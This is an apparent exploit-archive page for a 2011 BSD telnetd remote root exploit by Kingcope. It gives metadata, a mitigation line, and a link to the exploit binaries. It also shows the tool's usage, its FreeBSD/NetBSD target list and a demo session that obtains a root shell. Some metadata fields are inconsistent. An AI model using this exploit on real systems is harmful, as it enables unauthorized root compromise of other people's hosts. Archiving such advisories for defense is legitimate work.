header-logo
Suggest Exploit
vendor:
FreeBSD
by:
Kingcope
9,3
CVSS
HIGH
Remote Root Exploit
264
CWE
Product Name: FreeBSD
Affected Version From: FreeBSD 8.2 i386
Affected Version To: NetBSD 4.0 i386
Patch Exists: NO
Related CWE: N/A
CPE: o:freebsd:freebsd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: FreeBSD 8.2 i386, FreeBSD 8.0/8.1/8.2 i386, FreeBSD 7.3/7.4 i386, FreeBSD 6.2/6.3/6.4 i386, FreeBSD 5.3/5.5 i386, FreeBSD 4.9/4.11 i386, NetBSD 5.0/5.1 i386, NetBSD 4.0 i386, FreeBSD 8.2 amd64, FreeBSD 8.0/8.1 amd64, FreeBSD 7.1/7.3/7.4 amd64, FreeBSD 7.1 amd64, FreeBSD 7.0 amd64, FreeBSD 6.4 amd64, FreeBSD 6.3 amd64, FreeBSD 6.2 amd64, FreeBSD 6.1 amd64, TESTING i386, TESTING amd64
2011

BSD telnetd Remote Root Exploit *ZERODAY*

This exploit was leaked on the Full Disclosure mailing list and allows for remote root access on BSD telnetd. It was released by Kingcope in 2011.

Mitigation:

Disable telnetd service and use SSH instead.
Source

Exploit-DB raw data:

This exploit was leaked on the Full Disclosure mailing list:

http://seclists.org/fulldisclosure/2012/Jun/404


Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19520.zip


BSD telnetd Remote Root Exploit *ZERODAY*
By Kingcope
Year 2011

usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
        [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
[port]]
TARGETS:
0 FreeBSD 8.2 i386
1 FreeBSD 8.0/8.1/8.2 i386
2 FreeBSD 7.3/7.4 i386
3 FreeBSD 6.2/6.3/6.4 i386
4 FreeBSD 5.3/5.5 i386
5 FreeBSD 4.9/4.11 i386
6 NetBSD 5.0/5.1 i386
7 NetBSD 4.0 i386
8 FreeBSD 8.2 amd64
9 FreeBSD 8.0/8.1 amd64
10 FreeBSD 7.1/7.3/7.4 amd64
11 FreeBSD 7.1 amd64
12 FreeBSD 7.0 amd64
13 FreeBSD 6.4 amd64
14 FreeBSD 6.3 amd64
15 FreeBSD 6.2 amd64
16 FreeBSD 6.1 amd64
17 TESTING i386
18 TESTING amd64
Trying 192.168.2.8...
Connected to 192.168.2.8.
Escape character is '^]'.
Trying SRA secure login:
*** EXPLOITING REMOTE TELNETD
*** by Kingcope
*** Year 2011
USING TARGET -- FreeBSD 8.2 amd64
SC LEN: 30
ALEX-ALEX
 6:36PM  up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
USER             TTY      FROM              LOGIN@  IDLE WHAT
kcope            pts/0    192.168.2.3       6:32PM     4 _su (csh)
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
02:41:51 UTC 2011
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

Navigation

Suggest Exploit

Services By CQR